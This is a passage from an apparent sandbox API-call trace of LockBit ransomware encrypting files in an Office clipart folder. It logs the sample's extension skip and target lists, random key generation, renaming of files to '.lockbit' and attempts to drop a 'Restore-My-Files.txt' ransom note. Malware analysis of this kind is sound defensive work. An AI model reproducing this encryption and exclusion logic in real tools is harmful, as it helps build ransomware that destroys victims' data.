lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.705] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.705] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.lockbit") returned 72 [0109.705] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01635_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0109.706] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.706] malloc (_Size=0x40068) returned 0x1ff1e60 [0109.706] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=14996) returned 1 [0109.706] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.707] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0109.707] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.707] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.707] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0109.707] ReadFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0109.711] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.711] malloc (_Size=0xa6) returned 0x77d800 [0109.711] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.712] free (_Block=0x77d800) [0109.712] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01635_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.712] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.712] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.712] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe440e600, ftCreationTime.dwHighDateTime=0x1bd4bee, ftLastAccessTime.dwLowDateTime=0x600aeb50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe440e600, ftLastWriteTime.dwHighDateTime=0x1bd4bee, nFileSizeHigh=0x0, nFileSizeLow=0x752, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS01636_.WMF", cAlternateFileName="")) returned 1 [0109.715] lstrcmpiW (lpString1=".", lpString2="BS01636_.WMF") returned -1 [0109.715] lstrcmpiW (lpString1="..", lpString2="BS01636_.WMF") returned -1 [0109.715] PathFindExtensionW (pszPath="BS01636_.WMF") returned=".WMF" [0109.715] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.715] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.716] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.716] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS01636_.WMF") returned 1 [0109.717] lstrcmpiW (lpString1="ntldr", lpString2="BS01636_.WMF") returned 1 [0109.717] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS01636_.WMF") returned 1 [0109.717] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS01636_.WMF") returned -1 [0109.717] lstrcmpiW (lpString1="autorun.inf", lpString2="BS01636_.WMF") returned -1 [0109.717] lstrcmpiW (lpString1="thumbs.db", lpString2="BS01636_.WMF") returned 1 [0109.717] lstrcmpiW (lpString1="iconcache.db", lpString2="BS01636_.WMF") returned 1 [0109.717] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.717] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF") returned=".WMF" [0109.717] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.717] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.717] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.718] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.718] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.718] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.718] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.718] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.718] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.718] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.718] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.718] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.718] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.718] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.718] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.lockbit") returned 72 [0109.718] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01636_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3ac [0109.719] CreateIoCompletionPort (FileHandle=0x3ac, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.719] malloc (_Size=0x40068) returned 0x3ef0008 [0109.719] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=1874) returned 1 [0109.719] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.719] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.719] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0109.719] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.720] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.720] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0109.720] ReadFile (in: hFile=0x3ac, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0109.722] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.722] malloc (_Size=0xa6) returned 0x77d800 [0109.722] NtSetInformationFile (FileHandle=0x3ac, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.723] free (_Block=0x77d800) [0109.723] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01636_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.723] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.723] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.723] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x910b6b00, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x910b6b00, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0xf6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS01637_.WMF", cAlternateFileName="")) returned 1 [0109.723] lstrcmpiW (lpString1=".", lpString2="BS01637_.WMF") returned -1 [0109.723] lstrcmpiW (lpString1="..", lpString2="BS01637_.WMF") returned -1 [0109.723] PathFindExtensionW (pszPath="BS01637_.WMF") returned=".WMF" [0109.723] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.723] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.723] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.723] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.723] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.723] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.723] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.723] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.723] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.724] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.724] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0109.725] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BS01637_.WMF") returned 1 [0109.725] lstrcmpiW (lpString1="ntldr", lpString2="BS01637_.WMF") returned 1 [0109.725] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BS01637_.WMF") returned 1 [0109.726] lstrcmpiW (lpString1="bootsect.bak", lpString2="BS01637_.WMF") returned -1 [0109.726] lstrcmpiW (lpString1="autorun.inf", lpString2="BS01637_.WMF") returned -1 [0109.726] lstrcmpiW (lpString1="thumbs.db", lpString2="BS01637_.WMF") returned 1 [0109.726] lstrcmpiW (lpString1="iconcache.db", lpString2="BS01637_.WMF") returned 1 [0109.726] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0109.726] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF") returned=".WMF" [0109.726] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0109.726] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0109.726] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0109.727] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0109.727] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0109.727] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0109.727] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0109.727] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0109.727] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0109.727] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0109.727] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0109.727] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0109.727] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.lockbit") returned 72 [0109.727] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bs01637_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0109.728] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0109.728] malloc (_Size=0x40068) returned 0x3d70048 [0109.729] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3d70060 | out: lpFileSize=0x3d70060*=3948) returned 1 [0109.729] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db007c) returned 0x0 [0109.730] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0109.730] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0109.730] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db008c) returned 0x0 [0109.730] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0109.740] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0109.740] malloc (_Size=0xa6) returned 0x77d800 [0109.740] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0109.741] free (_Block=0x77d800) [0109.741] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BS01637_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0109.741] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0109.741] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0109.741] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd16ae900, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x51aadd90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd16ae900, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x292a, dwReserved0=0x0, dwReserved1=0x0, cFileName="BS01638_.WMF", cAlternateFileName="")) returned 1 [0109.741] lstrcmpiW (lpString1=".", lpString2="BS01638_.WMF") returned -1 [0109.741] lstrcmpiW (lpString1="..", lpString2="BS01638_.WMF") returned -1 [0109.741] PathFindExtensionW (pszPath="BS01638_.WMF") returned=".WMF" [0109.742] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0109.742] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0109.743] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0109.743] lstrcmpiW (lpString1=".msc", 